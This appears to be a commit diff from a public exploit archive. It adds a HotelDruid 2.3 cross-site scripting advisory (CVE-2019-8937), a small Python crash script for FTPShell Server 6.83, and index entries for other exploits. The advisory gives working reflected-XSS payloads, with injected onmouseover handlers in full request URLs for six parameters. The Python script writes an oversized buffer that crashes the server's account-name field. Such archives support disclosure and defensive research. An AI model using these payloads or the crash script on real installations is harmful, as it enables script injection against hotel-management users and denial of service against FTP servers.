# Exploit Title: Hoteldruid 2.3 - 'nsextt' XSS Injection
# CVE: CVE-2019-8937
# Date: 18-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/hoteldruid/
# Software Link: https://sourceforge.net/projects/hoteldruid/
# Version: v2.3
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: HotelDruid is a property management system (PMS)
designed to make hotel and hostel rooms
bed and breakfast apartments, or any other kind of daily rental easy to
manage from a web browser.
===========================================================================================
# POC - XSS
# Parameters : nsextt
# Attack Pattern : x%22+onmouseover%3dalert(0x000981)+x%3d%22
# GET Request : http://localhost/hoteldruid/visualizza_tabelle.php?nsextt=x"
onmouseover=alert(0x000981) x="
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Hoteldruid 2.3 - 'cambia1' XSS Injection
# CVE: CVE-2019-8937
# Date: 18-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/hoteldruid/
# Software Link: https://sourceforge.net/projects/hoteldruid/
# Version: v2.3
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: HotelDruid is a property management system (PMS)
designed to make hotel and hostel rooms
bed and breakfast apartments, or any other kind of daily rental easy to
manage from a web browser.
===========================================================================================
# POC - XSS
# Parameters : cambia1
# Attack Pattern : " onmouseover="alert(8562604)
# POST Request :
http://localhost/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671"
onmouseover="alert(8562604)
# https://i.hizliresim.com/6avvoE.jpg
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Hoteldruid 2.3 - 'mese_fine' XSS Injection
# CVE: CVE-2019-8937
# Date: 18-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/hoteldruid/
# Software Link: https://sourceforge.net/projects/hoteldruid/
# Version: v2.3
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: HotelDruid is a property management system (PMS)
designed to make hotel and hostel rooms
bed and breakfast apartments, or any other kind of daily rental easy to
manage from a web browser.
===========================================================================================
# POC - XSS
# Parameters : mese_fine
# Attack Pattern : " onmouseover="alert(6520859)
# POST Request :
http://localhost/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=periodi&mese_fine=13"
onmouseover="alert(6520859)
# https://i.hizliresim.com/v6NAzD.jpg
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Hoteldruid 2.3 - 'origine' XSS Injection
# CVE: CVE-2019-8937
# Date: 18-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/hoteldruid/
# Software Link: https://sourceforge.net/projects/hoteldruid/
# Version: v2.3
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: HotelDruid is a property management system (PMS)
designed to make hotel and hostel rooms
bed and breakfast apartments, or any other kind of daily rental easy to
manage from a web browser.
===========================================================================================
# POC - XSS
# Parameters : origine
# Attack Pattern : " onmouseover="alert(8987004))
# POST Request :
http://localhost/hoteldruid/personalizza.php?anno=2019&id_sessione=&aggiorna_qualcosa=SI&cambianumerotariffe=1&nuovo_numero_tariffe=8&origine=./creaprezzi.php"
onmouseover="alert(8987004)
# https://i.hizliresim.com/v6NAmO.jpg
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Hoteldruid 2.3 - 'anno' XSS Injection
# CVE: CVE-2019-8937
# Date: 18-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/hoteldruid/
# Software Link: https://sourceforge.net/projects/hoteldruid/
# Version: v2.3
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: HotelDruid is a property management system (PMS)
designed to make hotel and hostel rooms
bed and breakfast apartments, or any other kind of daily rental easy to
manage from a web browser.
===========================================================================================
# POC - XSS
# Parameters : anno
# Attack Pattern : " onmouseover="alert(1548690)
# POST Request :
http://localhost/hoteldruid/tabella3.php?id_sessione=&mese=01&tutti_mesi=1&anno=2019"
onmouseover="alert(1548690)
# https://i.hizliresim.com/EmAW68.jpg
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Hoteldruid 2.3 - 'origine' XSS Injection
# CVE: CVE-2019-8937
# Date: 18-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/hoteldruid/
# Software Link: https://sourceforge.net/projects/hoteldruid/
# Version: v2.3
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: HotelDruid is a property management system (PMS)
designed to make hotel and hostel rooms
bed and breakfast apartments, or any other kind of daily rental easy to
manage from a web browser.
===========================================================================================
# POC - XSS
# Parameters : origine
# Attack Pattern : " onmouseover="alert(6332576)
# POST Request :
http://localhost/hoteldruid/creaprezzi.php?anno=2019&id_sessione=&ins_rapido_costo=SI&tipocostoagg=perm_min&origine=crearegole.php"
onmouseover="alert(6332576)
# https://i.hizliresim.com/EmAW68.jpg
===========================================================================================

22
exploits/windows/dos/46430.py Executable file
View file

@ -0,0 +1,22 @@
#Exploit Title: FTPShell Server 6.83 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-02-20
#Vendor Homepage: http://www.ftpshell.com/index.htm
#Software Link: http://www.ftpshell.com/downloadserver.htm
#Tested Version: 6.83
#Tested on: Windows 7 x64 Service Pack 1
#Steps to produce the crash:
#1.- Run python code: FTPShell_Server_6.83.py
#2.- Open ftpshell.txt and copy content to clipboard
#3.- Open FTPShell Server
#4.- Select "Manage FTP Accounts"
#5.- Select "Add Account Name" > in "Account name to ban" Paste Clipboard
#6.- Click on "Ok"
#7.- Crashed
cod = "\x41" * 417
f = open('ftpshell.txt', 'w')
f.write(cod)
f.close()

2012
exploits/windows/dos/46432.pl Executable file
View file

File diff suppressed because it is too large Load diff

12
files_exploits.csv
View file

@ -6325,6 +6325,11 @@ id,file,description,date,author,type,platform,port
46417,exploits/windows/dos/46417.py,"NetSetMan 4.7.1 - 'Workgroup' Denial of Service (PoC)",2019-02-19,"Victor Mondragón",dos,windows,
46421,exploits/windows/dos/46421.py,"Valentina Studio 9.0.4 - 'Host' Denial of Service (PoC)",2019-02-19,"Victor Mondragón",dos,windows,
46422,exploits/windows/dos/46422.py,"BulletProof FTP Server 2019.0.0.50 - 'SMTP Server' Denial of Service (PoC)",2019-02-19,"Victor Mondragón",dos,windows,
46430,exploits/windows/dos/46430.py,"FTPShell Server 6.83 - 'Account name to ban' Denial of Service (PoC)",2019-02-20,"Victor Mondragón",dos,windows,
46432,exploits/windows/dos/46432.pl,"WinRAR 5.61 - '.lng' Denial of Service",2019-02-20,"Kağan Çapar",dos,windows,
46433,exploits/macos/dos/46433.txt,"FaceTime - Texture Processing Memory Corruption",2019-02-20,"Google Security Research",dos,macos,
46434,exploits/android/dos/46434.c,"Android Kernel < 4.8 - ptrace seccomp Filter Bypass",2019-02-20,"Google Security Research",dos,android,
46435,exploits/linux/dos/46435.txt,"MatrixSSL < 4.0.2 - Stack Buffer Overflow Verifying x.509 Certificates",2019-02-20,"Google Security Research",dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10317,7 +10322,8 @@ id,file,description,date,author,type,platform,port
46362,exploits/linux/local/46362.py,"snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2)",2019-02-13,"Chris Moberly",local,linux,
46370,exploits/windows/local/46370.txt,"exacqVision ESM 5.12.2 - Privilege Escalation",2019-02-14,bzyo,local,windows,
46369,exploits/linux/local/46369.md,"runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2)",2019-02-13,embargo,local,linux,
46416,exploits/windows/local/46416.txt,"MaxxAudio Drivers WavesSysSvc64.exe 1.6.2.0 - File Permissions SYSTEM Privilege Escalation",2019-02-19,"Mike Siegel",local,windows,
46416,exploits/windows/local/46416.txt,"MaxxAudio Drivers WavesSysSvc64.exe 1.6.2.0 - Local Privilege Escalation",2019-02-19,"Mike Siegel",local,windows,
46428,exploits/macos/local/46428.m,"Apple macOS 10.13.5 - Local Privilege Escalation",2019-02-13,Synacktiv,local,macos,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17196,7 +17202,8 @@ id,file,description,date,author,type,platform,port
46339,exploits/osx/remote/46339.rb,"Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit)",2019-02-11,Metasploit,remote,osx,
46340,exploits/php/remote/46340.rb,"NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit)",2019-02-11,Metasploit,remote,php,80
46342,exploits/multiple/remote/46342.py,"Indusoft Web Studio 8.1 SP2 - Remote Code Execution",2019-02-11,"Jacob Baines",remote,multiple,
46392,exploits/windows/remote/46392.txt,"mIRC < 7.55 - Remote Command Execution Using Argument Injection Through Custom URI Protocol Handlers",2019-02-18,ProofOfCalc,remote,windows,
46392,exploits/windows/remote/46392.txt,"mIRC < 7.55 - 'Custom URI Protocol Handlers' Remote Command Execution",2019-02-18,ProofOfCalc,remote,windows,
46436,exploits/hardware/remote/46436.rb,"Belkin Wemo UPnP - Remote Code Execution (Metasploit)",2019-02-20,Metasploit,remote,hardware,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -40883,3 +40890,4 @@ id,file,description,date,author,type,platform,port
46425,exploits/jsp/webapps/46425.html,"Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2 - Path Traversal / Cross-Site Scripting",2019-02-19,"Rafael Pedrero",webapps,jsp,
46426,exploits/php/webapps/46426.txt,"Ask Expert Script 3.0.5 - Cross Site Scripting / SQL Injection",2019-02-19,"Mr Winst0n",webapps,php,80
46427,exploits/java/webapps/46427.txt,"Jenkins - Remote Code Execution",2019-02-19,orange,webapps,java,
46429,exploits/php/webapps/46429.txt,"HotelDruid 2.3 - Cross-Site Scripting",2019-02-20,"Mehmet EMIROGLU",webapps,php,80

Can't render this file because it is too large.